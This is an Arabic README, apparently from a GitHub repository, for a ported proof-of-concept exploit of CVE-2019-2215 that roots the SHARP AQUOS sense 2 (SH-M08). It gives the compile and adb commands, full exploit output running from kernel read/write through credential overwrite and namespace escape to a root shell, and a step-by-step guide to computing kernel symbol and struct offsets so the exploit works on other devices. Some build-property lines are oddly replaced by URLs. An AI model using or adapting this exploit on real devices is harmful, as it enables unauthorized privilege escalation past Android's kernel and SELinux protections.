
استغلال إثبات المفهوم لـ CVE-2019-2215 يستهدف نواة أندرويد لتحقيق رفع صلاحيات الجذر على AQUOS sense 2 (SH-M08). يتضمن قراءة/كتابة النواة واستدعاء شل.
هذه نسخة منقولة لرمز إثبات المفهوم للحصول على صلاحية الجذر على أجهزة Android التي تحتوي على تصحيحات أمنية قبل أكتوبر 2019، خاصةً لهاتف AQUOS sense 2 (SH-M08).
تم تأكيد التشغيل على إصدارات نظام التشغيل التالية. لتشغيله على إصدارات أخرى أو أجهزة أخرى، يُرجى اتباع فصل "طريقة النقل".
[ro.build.date]: [2019年 3月 20日 水曜日 04:58:03 JST]
[ro.build.description]: [Anasui-user 8.1.0 S3200 01.00.02 release-keys]
[ro.build.display.id]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5B01.00.02%5D
[ro.build.fingerprint]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5BSHARP/SH-M08/SH-M08:8.1.0/S3200/01.00.02:user/release-keys%5D
[ro.build.id]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5BS3200%5D
[ro.build.product]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5BAnasui%5D
aarch64-linux-android21-clang -pie poc.c -o poc
$ adb push poc /data/local/tmp
$ adb shell
SH-M08:/ $ /data/local/tmp/poc shell
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffc0617bb800
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffc0a8e1f840
current->mm->user_ns == 0xffffff8009e225d8
kernel base is 0xffffff8008280000
&init_task == 0xffffff8009e16000
init_task.cred == 0xffffff8009e23dd0
init->cred
00000000 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00 |....?.......?...|
00000040 ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00 |....?...........|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 80 35 3e 5a c0 ff ff ff |.........5>Z....|
00000080 70 25 e2 09 80 ff ff ff d8 25 e2 09 80 ff ff ff |p%.......%......|
00000090 78 3e e2 09 80 ff ff ff 00 00 00 00 00 00 00 00 |x>..............|
000000a0 00 00 00 00 00 00 00 00 a7 01 00 00 00 00 00 00 |................|
000000b0 e0 ff ff ff 0f 00 00 00 88 3e e2 09 80 ff ff ff |.........>......|
000000c0 88 3e e2 09 80 ff ff ff 84 c9 0c 08 80 ff ff ff |.>..............|
current->cred == 0xffffffc0a9b549c0
Starting as uid 2000
current->cred
00000000 19 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00 |................|
00000010 d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00 |................|
00000020 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 00 00 00 00 af 0f aa c0 ff ff ff |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 00 91 bf 36 c0 ff ff ff |...........6....|
00000080 80 ce db a4 c0 ff ff ff d8 25 e2 09 80 ff ff ff |.........%......|
00000090 80 14 f8 a4 c0 ff ff ff 00 00 00 00 00 00 00 00 |................|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000c0 c0 40 b5 a9 c0 ff ff ff 00 00 00 00 00 00 00 00 |.@..............|
00000000 00 00 00 00 00 00 00 00 fe ff ff ff ff ff ff ff |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
init->security_cred
00000000 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
current->security_cred
00000000 ee 03 00 00 ee 03 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Escalating...
UIDs changed to root!
Capabilities set to ALL
SELinux status = 0
SELinux is already in permissive mode
Re-joining the init mount namespace...
Re-joining the init net namespace...
SECCOMP is already disabled!
------------------
00000000 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00 |....?.......?...|
00000040 ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00 |....?...........|
00000050 00 00 00 00 00 00 00 00 00 af 0f aa c0 ff ff ff |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 00 91 bf 36 c0 ff ff ff |...........6....|
00000080 80 ce db a4 c0 ff ff ff d8 25 e2 09 80 ff ff ff |.........%......|
00000090 80 14 f8 a4 c0 ff ff ff 00 00 00 00 00 00 00 00 |................|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000c0 c0 40 b5 a9 c0 ff ff ff 00 00 00 00 00 00 00 00 |.@..............|
Spawning shell!
SH-M08:/ #
احصل على النواة قيد التشغيل حاليًا على الجهاز. هناك طريقتان:
الاستخراج من OTA إذا كان boot.img أو recovery.img موجودًا داخل تحديث OTA، فاحصل عليه من هناك. تأكد من أن الملف مطابق للإصدار المستخدم حاليًا. يمكنك أيضًا استخدام الأداة التالية لاستخراج Google OTA: https://github.com/mouseos/android-checkin-py.git من boot.img وما شابه، يمكن استخراج zImage باستخدام abootimg. يمكن تحويل zImage إلى vmlinux باستخدام extract-vmlinux.
بناء النواة قم ببناء شيفرة مصدر النواة التي تنشرها الشركة المصنعة رسميًا. استخدم defconfig المطابق تمامًا للجهاز قيد التشغيل حاليًا. لا تقم بتعديل الشيفرة أثناء البناء قدر الإمكان. بعد اكتمال البناء، يجب إنشاء vmlinux.
$ nm -n ./vmlinux | grep ' _head$'
ffffff8008080000 t _head
$ nm -n ./vmlinux | grep ' init_user_ns$'
ffffff8009c225d8 D init_user_ns
$ nm -n ./vmlinux | grep ' init_task$'
ffffff8009c16000 D init_task
$ nm -n ./vmlinux | grep ' init_uts_ns$'
ffffff8009c15dc0 D init_uts_ns
$ nm -n ./vmlinux | grep ' selinux_enforcing$'
ffffff8009de2000 D selinux_enforcing
{قيمة كل إزاحة} - {قيمة _head}
على سبيل المثال، في الحالة أعلاه، تكون الثوابت كما يلي:#define SYMBOL__init_user_ns 0x1BA25D8
#define SYMBOL__init_task 0x1B96000
#define SYMBOL__init_uts_ns 0x1B95DC0
#define SYMBOL__selinux_enforcing 0x1D62000
$ pahole -C task_struct vmlinux | grep -E ' mm;'
struct mm_struct * mm; /* 1336 8 */
تحويل 1336 إلى سداسي عشري يعطي 0x538.
وبالتالي #define OFFSET__task_struct__mm 0x538
$ pahole -C task_struct vmlinux | grep -E ' cred;'
const struct cred * cred; /* 1944 8 */
تحويل 1944 إلى سداسي عشري يعطي 0x798.
وبالتالي #define OFFSET__task_struct__cred 0x798
$ pahole -C mm_struct vmlinux | grep ' user_ns;'
struct user_namespace * user_ns; /* 752 8 */
تحويل 752 إلى سداسي عشري يعطي 0x2f0.
وبالتالي #define OFFSET__mm_struct__user_ns 0x2F0
$ pahole vmlinux
libbpf: failed to find '.BTF' ELF section in vmlinux
pahole: file 'vmlinux' has no supported type information.
لا يحتوي vmlinux على المعلومات المطلوبة لتحليل pahole. في هذه الحالة، لا يمكن التحليل، لذا استخدم النواة التي بنيتها بنفسك من شيفرة المصدر المنشورة من قبل الشركة المصنعة.
إحدى الإزاحات غير صحيحة.
لا يعمل على أنظمة التشغيل التي تحتوي على تصحيحات أمنية من أكتوبر 2019 فصاعدًا.
يعتمد هذا الرمز على POC الذي أنشأه Grant H. https://github.com/grant-h/qu1ckr00t
| اسم الثابت | قيمة الإزاحة | قيمة الإزاحة - قيمة _head |
|---|
| SYMBOL__init_user_ns | 0xffffff8009c225d8 | 0x1BA25D8 |
| SYMBOL__init_task | 0xffffff8009c16000 | 0x1B96000 |
| SYMBOL__init_uts_ns | 0xffffff8009c15dc0 | 0x1B95DC0 |
| SYMBOL__selinux_enforcing | 0xffffff8009de2000 | 0x1D62000 |